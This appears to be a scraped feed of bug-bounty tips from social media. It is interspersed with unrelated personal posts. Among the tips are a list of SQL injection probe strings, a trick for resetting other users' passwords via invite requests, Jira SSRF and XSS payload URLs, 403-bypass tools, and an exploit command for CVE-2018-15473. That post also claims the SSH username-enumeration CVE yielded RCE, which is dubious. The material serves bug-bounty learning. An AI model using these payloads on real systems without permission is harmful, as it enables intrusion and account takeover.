This is how to find sql-Injection 100% of the time For site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''='

Recently during initial #recon, I came across a vulnerable Splunk instance which had a sensitive information disclosure vulnerability (P3). Always go deep searching for #exploits and #cves whenever you encounter a third-party service. #BugBountyTip #security #bugbounty #bugs

Hussein Daher While inviting users into your account/organization, you can also try inviting company emails and add a new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a user password. #BugBountyTips 1/3

Thanks bugcrowd

Hey bountyhunters, here is an honest tip: Don't rely on twitter. Stop consuming what makes other hunters money, and start hunting and getting experience with methodologies, techniques, tools, and bug-classes that work for you. #bugbountytips #bugbounty

For Newbie Who Seeking Site for Hunting github.com/Sajibekanti/Bu…

Thanks DJI

A short list of endpoints (From Unknown Resource but thanks to that guy for sharing this with me) #bugbounty #cybersecurity #bugbountytips #bugbountytip #bugcrowd #intigriti #hackerone #bugs #Pentesting

Hello Friends I will be Join as Security Consultant at DroitLab (Dhaka) 🙏🙏

We just added publicly disclosed issues from HackerOne sorted by vulnerability type so you can learn what types of vulnerabilities to look for on specific programs. More features in the pipeline on the way to help you with your hunt! bugbountyhunter.com/disclosed/

Hello World Found another Scammer HedgeTrade Don't use there Service they are Scam To Customer & Employee If anyone need Proof DM Me ./

My biggest contribution to github ever made: byp4xx, a simple bash script to bypass 403 forbidden error using methods mentioned in #bugbountytips: github.com/lobuhi/byp4xx/

Burpsuite extension to bypass 403 restricted directory. Installation BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Fininsh. github.com/sting8k/BurpSu…

#bugbounty #bugbountytips Found a $$$$ RCE with CVE-2018-15473 Steps : 1. Found an IP of the company eg: testing.com then cloned the CVE from github.com/Rhynorater/CVE… 2. Ran the command /sshUsernameEnumExploit.py --username root 0.0.0.0 (ip)

Bug bounty tip: is:issue label:Vulnerable and is:issue label:"Edge case" are your friends on github.com/EdOverflow/can…. :)

medium.com/immunefi/bitsw…

I will join QNAP as Information Security Researcher

Jira Vulnerabilities: 1. CVE-2017-9506(SSRF): http://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=http://bing(.)com 2. CVE-2018-20824(XSS): http://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) (1/n)

What happened Facebook in Bangladesh? account get Auto logout & cant login